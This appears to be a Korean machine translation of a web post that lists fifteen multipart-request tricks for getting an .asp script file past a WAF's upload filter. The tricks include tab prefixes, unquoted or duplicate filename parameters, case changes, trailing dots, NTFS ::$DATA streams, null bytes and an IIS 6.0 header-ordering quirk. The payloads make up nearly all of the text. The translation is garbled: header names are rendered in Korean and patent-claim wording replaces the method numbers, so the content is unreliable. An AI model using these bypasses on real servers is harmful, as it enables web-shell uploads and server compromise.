원본 링크 : https://www.cesafe.com/8411.html
원래 요청 패킷 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 내용 -Disposition을 : 폼 데이터를; = "파일 경로를"이름; 파일 이름 = "cesafe.asp" 콘텐츠 - 유형 : 텍스트 / html로
1, 파일 이름 프리픽스 플러스 [은 0x09] 바이 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 내용 -Disposition을 : 폼 데이터를; = "파일 경로를"이름; 파일 이름 = "[ 은 0x09 ] cesafe.asp" 콘텐츠 - 유형 : 텍스트 / html로
방법 2, 따옴표를 제거 할 수있는 파일 이름은 무시 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 내용 -Disposition을 : 폼 데이터를; = "파일 경로를"이름; 파일 이름 = cesafe.asp의 내용 - 유형 : 텍스트 / html로
방법 3, 파일 이름 1 파일 이름 매개 변수를 추가, 바이 패스를 지정합니다 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 내용 -Disposition을 : 폼 데이터를; = "파일 경로를"이름; 파일 이름 = "cesafe.asp"; 파일 이름 1 = "test.jpg를" 콘텐츠 - 유형 : 텍스트 / html로
. 방법 4는, 가변으로 형성 F + ORM 조성물 바이 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 콘텐츠 -Disposition : F + ORM 데이터; = "파일 경로"를 이름, 파일 이름 = "cesafe.asp" 콘텐츠 - 유형 : 텍스트 / html로
방법 5, 파일 이름 접미사는 경우를 우회 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 콘텐츠 -Disposition : 폼 데이터; = "파일 경로를"이름; 파일 이름 = "cesafe.Asp" 콘텐츠 - 유형 : 텍스트 / html로
6. 방법은 제거하기위한 폼 데이터 변수 우회 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 콘텐츠 -Disposition = "파일 경로"이름; 파일 이름 = "cesafe.asp" 콘텐츠 - 유형 : 텍스트 / html로
도 7에있어서, 내용 - 처리 : 공간 또는 복수의 첨가 후 형태 데이터, 우회 복수의 공간의 첨가 후 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 콘텐츠 -Disposition : 폼 데이터; = "파일 경로를"이름; 파일 이름 = "cesafe.asp" 콘텐츠 - 유형 : 텍스트 / html로
. 방법 8 cesafe.asp (. 공백 . +)를 우회 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 콘텐츠 -Disposition : 폼 데이터; = "파일 경로를"이름; 파일 이름 = "cesafe.asp." 내용 - 유형 : 텍스트 / html로
방법 9, "캐리지 리턴 라인, 우회 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 콘텐츠 -Disposition : 폼 데이터; = "파일 경로를"이름; 파일 이름 = "cesafe.asp" 콘텐츠 - 유형 : 텍스트 / html로
방법 10, NTFS 파일 이름에 추가 스트림 $의 데이터 바이 패스 : : :
--WebKitFormBoundary2smpsxFB3D0KbA7D 콘텐츠 -Disposition : 폼 데이터; = "파일 경로를"이름; 파일 이름 = "cesafe.asp :: $ DATA"콘텐츠 유형 : 텍스트 / html로 또는 --WebKitFormBoundary2smpsxFB3D0KbA7D 콘텐츠 -Disposition : 폼 데이터; = "파일 경로를"이름; 파일 이름 = "cesafe.asp :: $ DATA의 \ × 00의 \의 fuck.asp0x00.jpg" 콘텐츠 - 유형 : 텍스트 / html로
11, IIS 6.0 테스트의 발견 후에는 항상 수신기 매개 변수로 먼저 내용 - 처리의 값을 취하고, 보안 강아지의 값은 항상 수신자로 내용 - 처리 매개 변수의 마지막입니다. 따라서 다음과 같은 구성 [성공 업로드 cesafe.asp]을 요청하려고합니다 :
내용 - 처리 : 폼 데이터; = "FileUploadName을"이름; 파일 이름 = "cesafe.asp"---------- 15377259221471 내용 -Disposition : 폼 데이터; = "FileUploadName을"이름; 이름 = "cesafe.txt" 콘텐츠 - 유형 : 애플리케이션 / octet- 스트리밍 콘텐츠 -Disposition을 : 폼 데이터; = "FileUploadName을"이름; 파일 이름 = "cesafe.asp" 내용 -Disposition : 폼 데이터; = "FileUploadName을"이름; 파일 이름 = "cesafe.asp"
(12)에있어서, 콘텐츠 타입 및 콘텐츠 - 처리 우회 위치의 역순 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 내용 - 유형 : 텍스트 / html로 내용 -Disposition : 폼 데이터; = "파일 경로를"이름; 파일 이름 = "cesafe.asp"
13 항에있어서, 파일명 스페이스 접두어 ( Tab 키 대안) 우회 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 내용 -Disposition을 : 폼 데이터를; = "파일 경로를"이름; 파일 이름 = "cesafe.asp" 콘텐츠 - 유형 : 텍스트 / html로
14 항에있어서, 폼 데이터 바이 패스 스페이스 전 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 내용 -Disposition : 폼 데이터, 이름 = "업로드"; 파일 이름 = "cesafe.asp" 콘텐츠 - 유형 : 텍스트 / html로
청구항 15에있어서 의 전 또는 폼 데이터를 더한 후 + 바이 :
--WebKitFormBoundary2smpsxFB3D0KbA7D 내용 -Disposition : + 폼 데이터; = "파일 경로를"이름; 파일 이름 = "cesafe.asp" 콘텐츠 - 유형 : 텍스트 / html로